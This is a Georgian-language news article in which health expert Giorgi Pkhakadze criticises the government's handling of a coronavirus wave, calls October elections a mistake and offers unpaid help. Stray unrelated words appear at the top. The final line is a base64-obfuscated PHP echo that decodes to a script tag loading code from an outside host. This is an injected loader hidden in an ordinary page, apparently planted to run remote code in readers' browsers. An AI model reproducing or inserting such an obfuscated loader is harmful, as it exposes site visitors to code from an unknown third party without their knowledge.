celsiusi
ავერსი საქკაბელი
პროფესორი, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელი, გიორგი ფხაკაძე საქართველოს მთავრობას და იმ ადამიანებს მიმართავს ვინც ქვეყანაში ვირუსის მართვაზეა პასუხისმგებრლი. 
 
“თქვენ ხართ უმძიმეს სიტუაციაში და სიმართლე გითხრათ, არ მინდა, ვიყო თქვენს მდგომარეობაში. იმდენი შეცდომა დაუშვით, რომ სპეციალურადაც რომ გააკეთო, ამდენ შეცდომას მაინც ვერ დაუშვებ.  აგვისტო საქართველოსთვის უმძიმესი იქნება. ასობით საქართველოს მოქალაქის სიცოცხლე დაიკარგება ვირუსის ამ კონკრეტული ტალღის შედეგად. 
 
ერთანეთის ლანძღვის, „გაშავების“, პიარის დრო ახლა ნამდვილად არ არის. ახლა არის ერთადერთი რამის დრო - დავეხმაროთ ერთმანეთს. უკვე აღარაა საუბარი, რა მოხდება 1-2 კვირაში, საუბარია, 1 დღეში, 2-10 საათში რა მოხდება. 
 
კიდევ ერთხელ საჯაროდ ვამბობ - მე ბევრ რაღაცაში არ ვეთანხმები დაავადებათა კონტროლის ეროვნულ ცენტრს, ჯანდაცვის და სხვადასხვა სამინისტროებს, მაგრამ ეს ქვეყანა ერთია და ეს ქვეყანა არ არის თქვენი, იმისი, ამისი, ჩემი, შენი, ეს ქვეყანა ჩვენია” - აცხადებს გიორგი ფხაკაძე. 
 
მისივე თქმით, მათ ვინც ახლა მართავს ქვეყანას ძალიან დიდი შეცდომა დაუშვა, ყველა პოლიტიკურმა პარტიამ, რადგან არჩევნების ჩატარება ოქტომბერში შეცდომაა. ეს იმას ნიშნავს, რომ იქნება წინასაარჩევნო უპირბადო შეხვედრები, მიტინგები, თავყრილობები და, სამწუხაროდ,  ეს უფრო გაართულებს ვითარებას.
 
გიორგი ფხაკაძე ამჯერადაც აცხადებს რომ მზადაა ქვეყანას უანგაროდ დაეხმაროს ვირუსის მართვის პროცესში, როგორც საერთაშორისო ჯანდაცვის ექსპერტი. 
 
“ბევრ რამეში არ გეთანხმებოდეთ, მაგრამ ახლა უმთავრესია, ქვეყანას რა სჭირდება - თუ ჩემი პატარა რჩევა ვინმეს დაგჭირდებათ, მე ვარ ღია და უანგაროდ დაგეხმარებით. არ მაინტერესებს არც თქვენი თანამდებობა, არც ხელფასი, არაფერი საერთოდ, ოღონდ  ერთი სიცოცხლე მაინც გადავარჩინოთ.”- ამბობს ფხაკაძე. 
 
მისივე თქმით, საქართველოს მთავრობამ ბევრი შეცდომა დაუშვა, მაგრამ ახლა არ არის მტყუან-მართალის განხილის დრო. ახლა ქვეყანას შველა სჭირდება. 
 
“მე ვარ ღია ყველასთვის, დაგეხმარებით, ყველა ჩემს რესურსს გამოვიყენებ, ყველა ჩემს მეგობარს ჩავრთავ. ახლა ჩვენ ვლაპარაკობთ სიცოცხლეებზე. მეორე დღეა, დღეში 26 ადამიანის სიცოცხლეს გვართმევს ვირუსი. ეს ოფიციალურად, არაოფიციალურზე აღარ ვსაუბრობ.მე ვიყავი პირველი, ვინც მეოთხე ტალღაზე დავიწყე საუბარი, სამწუხაროა, მაგრამ დაახლოებით 2 კვირაში ჩვენ ნოემბრის ინფიცირების ციფრებს მივუახლოვდებით.  ხომ შეიძლეა სიცოცხლეების გადასარჩენად გაერთანდეთ, რომ ოქტომბრამდე ცოცხალი მივიდეს თქვენი ამომრჩეველი?! ხომ უნდა ჩაგიგდოთ ვიღაცამ საარჩევნო ბიულეტენი?! ხოდა გადაარჩინეთ ეს ხალხი ახლა. როცა ჩვენს ქვეყანაში კრიტიკული სიტუაციები დგებოდა, ჩვენ ვერთიანდებოდით. მჯერა, ამას ახლაც მივახერხებთ. გადავდოთ უთანხმოებები და ხვალინდელ დღეზე ვიფიქროთ.”- აცხადებს გიორგი ფხაკაძე.
 
 
5631
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");